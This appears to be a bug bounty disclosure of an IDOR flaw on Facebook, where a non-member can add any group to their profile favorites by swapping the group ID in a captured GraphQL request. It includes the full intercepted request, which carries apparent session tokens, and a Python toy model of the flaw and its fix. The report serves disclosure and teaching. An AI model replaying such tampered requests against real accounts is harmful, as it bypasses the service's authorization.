June 9, 2026
IDOR allows non-group members to add any group to favorites on their Facebook profile
Allows users who are not members of a group to add any group to their favorites on their Facebook profile.
Rohmad Hidayah
Description/Impact
On Facebook, normally only group members can add a group to their profile's favorites. However, this IDOR vulnerability allows non-group members to add any public or private group to their profile. This violates Facebook's policies and rules.
Repro Steps
Users: [User A, User B, Group A, Group B]
Environment: [Group A with owner and admin User A, Group B with owner and admin User B, User A is not a member of Group B, User A gets User B's Group ID B]
Browser: [Firefox]
OS: [Windows]
Reproduction Steps
- User A logs into their account at https://web.facebook.com/
- User A creates a public/private group with a name, for example, "User A's Group"
- User A opens their profile > clicks the three dots > Turn on professional mode > Turn on > goes to the "About" tab > Communities > Favorite groups > adds "User A's Group" > clicks "Save" while intercepting the request.
- A request with the following parameters will be sent.
POST /api/graphql/ HTTP/1.1
Host: web.facebook.com
Cookie: USER_A_COOKIE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Fb-Friendly-Name: useProfileCometDirectorySectionSaveMutation
X-Fb-Lsd: tf7HoI5Xtfnkruo-5fRnZM
X-Asbd-Id: 359341
Content-Length: 4777
Origin: https://web.facebook.com
Referrer: https://web.facebook.com/petanijagungg/directory_communities
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connections: keep-alive
av=61554410315919&__aaid=0&__user=61554410315919&__a=1&__req=26&__hs=20573.HYP%3Acomet_pkg.2.1…0&dpr=1&__ccg=GOOD& __rev=1038478904&__s=v83elk%3Ajezoq9%3Acy7ydh&__hsi=7634427810661777765&__dyn=7xeUjGUW13xt0mUyEqxemh0MBwCwWwIxu13wFw hUKbgS3q2ibwNw9G2Saxa1NwJwpUe8hwaG0Z82_CxS320qa2OU7m2210wEwgo9oO0-E4a3a4oaEnxO0Bo7O2l2Utwqo5W1ywiE4u9x-3m1mzXw8W58jwGzEjzF U5e3ym2SU4i5oe8cEW4–5pUfEe88o4qum7–2K3y0EouwLyEbUGdG1QwVwwwOg2ZwhEkxebwHwKG4VUjwFg2fwxyo566k1fxC13xecwBwUU-4rwEKufxamEbbxG1 fBG2–1mwto46fwk83KwHwOyUqxG0K83jxG&__csr=l0DgmgmMHsh2AaNTvbst10yNds9ZMBbdkviT922lT6lvk_tiYszN2iFT8z9vIAOJFrHFfmAhbqhKCKjWh 2AFiAVeQiFt6YDlFBO9S8Lj89noyiGjGKL_TqkOYZtbVaZliGWRm8FHKuV5GKimmhaQaVvmiWRyqyvJFmeBnCl5CBFAVQhlGiGXAhAFFGGWQdplqEyF-qAiAFe- aKHAAK8KqkCcxaHDKV6FUOGGcABhUZ9umuuDGBhvJypFFogK8LtavqhKmFazoN4Bhd4zbzEzBCxamcgNoGVqhaVXFuF8Fa4UkWDAyfHBCXy49rXmUJHWKFXxBx a9CDypQuuazKXG59WyHzuAdzoZ4LJ13xeGpo_yoiGchpbxuEG7EjxibzrGmVUiCx91G49ayWx-cBHzrykbgjxu8DDyGzEG4orAxbUaVUCEScAx68wCyUKU8E8oG 5qx26UV1Fa9LxCehUSi2–4u58yAEowRxmu291J1i10wKhExBxC6UuwzyEcoboS5UiwxK68cFU7u6o3JBwkE8UoUa811ZwDwn8boW1ywpo2Lw_w9e3efK8xFyoa k2aCAFGZ2EhwiUC7A9yo8E4nyE8UC3O3CcyU0Zh0c902po0eko13602bSczQ04CU0vCK28w07pe01HQwNoswpk1ExG0v5wrobe0vSaK0gu6o6q1izpy0125wnZx no3qw0xhxN481Nyo086u0mS3W3G0mq0kp02jU4W05p60aRw69g1OPz87h1S9lBw0g_o38w1fa09zc3K2u0zE1TU1j61OQifwNg4r81lwnU0Dq04RUdC1Fw7jo1 AU6B8EO78rQ16gnDwMxu77w2dsw1hU66045EGajo1dE&__hsdp=gby542i5h2qi3x2GI889AgwggtAasohEPeo8414ChF84N1G3aEN38kynqiaxOMwKzdAMIy8q 4xY9TfR3N0iC94EUukj7awV2q8Bi5gEoso989PmIMBN2p3ggiA_paaBBEGO7EmesG94bayCVyGgwVCtEYh68P1fi1pORbAEB4Ebii2xyj4djTrcxG316ClWOGA ty28cFE8GEFcxd5BiBgih8Wl5yOQsi9h4At2k9gSQV93DF6z4t5eRADBaFAG8p7zoiXh9rDGifBCN2gNk4m2e2ivEMJbo-UG5216p6yFO2EnhixgkBwAGEiaEId DJxuehF8O1lLtczA9h4i4EKqib8tXm2dx2axe2S2qfy8B38izp8S9giBiwTF0Ty8mwBgc4h1haV9Uhxm4XyE8ouyU529HG3yU1eBx69o6mU4–58aEmyBUcUQN8 eo9K26to8E8–4WAyA1rQ3Gcxiqqel2E6iEKcwQDRgix60zBl0q9Gg2CAwl8rx-0Co9_zUB2Ulwlo3uBxC7Wg2lG1vU3Myo3EwuUfE5Sm0iCbwNws8fU6u0CE2Ow 
IwaO10w5iw9i4E2OwbC0EE4i7Uf84iq2y0Cob8pwoUy1Cwv836zoaU6a15xiu0jK1MwJwkE5y0mm0Z40sC0Dpo6G1XwqE1qU560vS0Oo5q1sAzE8o2Sg4m3e1z we6mu7obE5q2i0SQ0hO1Inwk86B0kawPx227K1-g3oxu6E1kFUC1_K1rwww5iz84–5o0Aqm0S8y&__hblp=0xDZ0OhFh3l3p89e1XgiwZwio2qxZ1WA2y1kU3s zQ322fG2m10wxy8G2S0LUqxydwhU88izQ7EcQi6Urwlk9xe26dzU564opwWwBwExSVEbU5S4UuwVwpo6K9y88Wx67oB0Ag24zU4q2mfwTwExa8wYxi7p45C8xC 5onyEx0SyU4Z2o4Kcwjo3pxe2O14F0jA9yEpG2iewQxa3W1awIxm4e5984u69qwnoS1HxqEoxS5F-A4Ehw9a1Cwzwio4y222SawgE2iwHwDxi1lwxwbOm4VopBF 3o5O2GEbUb-5VXVoowCx-4UG489EOaDws85q68a85a3W1tBz86–1KxO22byEC1nCwwzofU-awSyEGbw8W0TUaEa85y10zE4q2C1DwqE2kxa1mxG10w8C5opwaa 14yUjwFxai5U2dwoUC6oyq4E6e8wpE76awoEqwKxCdwHwoElUbokDw4Xws8–6985a350BxK2y0i24p8qwDU5a16wuF8ao-0g-0Dpo6G1XwqEdU1cVo4K0giU6K1 mwNxOdwpUdEtguxy1sAzE8o4C1szQ15wPwoU3xBDzEy2y8Hwl8983rg10Uowr5U4u8wqk1gG14wxXwLwjA0Q9VohxG1Kweeu9wzwmXwXx-1AwdN3EG8zoOmfgo x-5o5a32dxO0pum740J9ohw&__sjsp=gby542i5h2qi3x2GI889AgwggtAasohEPeo8414ChF84N1Gf48WEN38kynqiSyAaI8bEPpwz8y8q4xYIQRPZgB5A1aoA izxVhcsG3A9Eyl8l2xxNwyMDilHcahmSgzJUp8jJDKmmC9yy0wHyoBDVAGBoXCtcYhoVJ1EMdWy26BQ4lq8C7kem9DhK2RCGp7yowy2cF6wwUR2Z2QFk4Ai5oh mEwi9h4At2k9ghjxG7kfm2sxVUS64ewKgx35gig4y7kEnx-3ow8A1ox8GyMQ3S1JgdU9k8hk0hO643R0cJ049UeXw2tRU2IU0iRwc7x69z809y8&__comet_req =15&fb_dtsg=NAfuWwrfT_MnJMbqq4-FxJaJA2FwWrm72bKzHmYktqi1sdnLDwk2tJg%3A5%3A1767594021&jazoest=25660&lsd=tf7HoI5Xtfnkruo-5fR nZM&__spin_r=1038478904&__spin_b=trunk&__spin_t=1777528741&__crn=comet.fbweb.CometProfileDirectoryCommunitiesTabRoute&fb_ap i_caller_class=RelayModern&fb_api_req_friendly_name=useProfileCometDirectorySectionSaveMutation&server_timestamps=true&var iables=%7b%22input%22%3a%7b%22actor_id%22%3a%2261554410315919%22%2c%22client_mutation_id%22%3a%222%22%2c%22directory_sectio n_type%22%3a%22FAVORITE_GROUPS%22%2c%22items%22%3a%5b%7b%22associated_entity_id%22%3a%22GROUP_A_ID%22%2c%22id%22%3a%22GROU 
P_A_ID%22%2c%22subtitle%22%3a%22%22%2c%22text%22%3a%22Farmer%20Corn%22%7d%5d%2c%22logging_data%22%3a%7b%22nav_chain%22%3a%22ProfileCometAboutTabRoot.react%2ccomet.profile.collection.directory_communities%2cunexpected%2c1777528748479%2c231791%2c%2c%2c%3bProfileCometAboutTabRoot.react%2ccomet.profile.collection.about%2cunexpected%2c1777528745132%2c28534%2c%2c%2c%22%7d%2c%22privacy%22%3a%7b%22allow%22%3a%5b%5d%2c%22base_state%22%3a%22EVERYONE%22%2c%22deny%22%3a%5b%5d%2c%22tag_expansion_state%22%3a%22UNSPECIFIED%22%7d%2c%22session_id%22%3a%225181c298-3e68-4431-bbd1-bd50315c5d06%22%2c%22should_share_to_feed%22%3afalse%7d%2c%22sectionToken%22%3a%22YXBwX3NlY3Rpb246NjE1NTQ0MTAzMTU5MTk6MjMyNzE1ODIyNw%3d%3d%22%2c%22collectionToken%22%3a%22YXBwX2NvbGxlY3Rpb246cGZiaWQwNlJWSEV3Y1RoNVhwbnVURmpZakJyQkd4Zkh4eVk2S0FpRG4yTW1qYnNpV0tDN3dqWjZia2ZXc0M0dGVtUGFiczZTRnRXeUoyaVhFZUQ5N013eFNDN0xuamtKWmtnbA%3d%3d%22%2c%22useDefaultActor%22%3afalse%2c%22scale%22%3a1%7d&doc_id=26810498305226299
- In this parameter
**"associated_entity_id":"GROUP_A_ID","id":"GROUP_A_ID"**, change the value to User B's Group ID > send the request > the server returns a **200 OK** response.
- User A returns to the browser > refreshes the page > User B's Group B is now added to User A's profile even though User A is not a member of Group B.
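The missing authorization check that the description and the repro steps above turn on, as an added example that is not Facebook's code: a toy model of the favorite-groups mutation handler. It parses a constructed request body shaped like the captured `variables` parameter, extracts `associated_entity_id` from each item, and shows the vulnerable handler (which trusts the supplied group IDs) next to a hardened one that verifies the session user is a member of every referenced group. The membership table, the user and group IDs, the function names and the assumed actor/session check are all constructed for this example.

```python
import json
from urllib.parse import parse_qs, urlencode

# Constructed membership table mirroring the report's environment:
# Group A belongs to User A, Group B to User B, and User A is not a
# member of Group B. IDs are placeholders, not real Facebook IDs.
USER_A, USER_B = "USER_A_ID", "USER_B_ID"
GROUP_A, GROUP_B = "GROUP_A_ID", "GROUP_B_ID"
MEMBERSHIPS = {GROUP_A: {USER_A}, GROUP_B: {USER_B}}


def build_body(actor_id, group_ids):
    """Constructed client body carrying only the fields of the captured
    `variables` parameter that matter for this mutation."""
    variables = {
        "input": {
            "actor_id": actor_id,
            "directory_section_type": "FAVORITE_GROUPS",
            "items": [
                {"associated_entity_id": gid, "id": gid, "subtitle": "", "text": "Some Group"}
                for gid in group_ids
            ],
        }
    }
    return urlencode({"variables": json.dumps(variables)})


def parse_items(body):
    """Return (actor_id, [group ids]) from a urlencoded GraphQL form body."""
    variables = json.loads(parse_qs(body)["variables"][0])
    inp = variables["input"]
    return inp["actor_id"], [item["associated_entity_id"] for item in inp["items"]]


def save_favorites_vulnerable(session_user, body, memberships=MEMBERSHIPS):
    """Behaviour the report describes: the actor/session binding is checked
    (an assumption here), but the group IDs in `items` are trusted as supplied."""
    actor_id, group_ids = parse_items(body)
    if actor_id != session_user:
        return {"status": 403, "error": "actor_id does not match session"}
    return {"status": 200, "favorite_groups": group_ids}


def unauthorized_groups(session_user, group_ids, memberships):
    """Object-level check: the IDs the actor may NOT reference. Unknown and
    non-member groups are treated alike so the response does not reveal
    whether a private group ID exists."""
    return [gid for gid in group_ids if session_user not in memberships.get(gid, set())]


def save_favorites_hardened(session_user, body, memberships=MEMBERSHIPS):
    """Hardened handler: the whole request is rejected if any referenced
    group fails the membership check, so a list mixing one legitimate group
    with one foreign group does not partially succeed."""
    actor_id, group_ids = parse_items(body)
    if actor_id != session_user:
        return {"status": 403, "error": "actor_id does not match session"}
    denied = unauthorized_groups(session_user, group_ids, memberships)
    if denied:
        return {"status": 403, "error": f"not a member of {len(denied)} group(s)"}
    return {"status": 200, "favorite_groups": group_ids}


if __name__ == "__main__":
    legit = build_body(USER_A, [GROUP_A])       # User A saving its own group
    tampered = build_body(USER_A, [GROUP_B])    # same body with Group B's ID swapped in
    print(save_favorites_vulnerable(USER_A, tampered))  # status 200: the IDOR
    print(save_favorites_hardened(USER_A, legit))       # status 200
    print(save_favorites_hardened(USER_A, tampered))    # status 403
```

The point of the hardened variant is that authorization is evaluated per referenced object, not once per request: checking that `actor_id` matches the session proves who is calling, but says nothing about whether that caller may reference Group B, which is exactly the gap the report exercises.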
Timeline
April 30, 2026: Submit Report
May 5, 2026: Initial Evaluation
June 9, 2026: Informative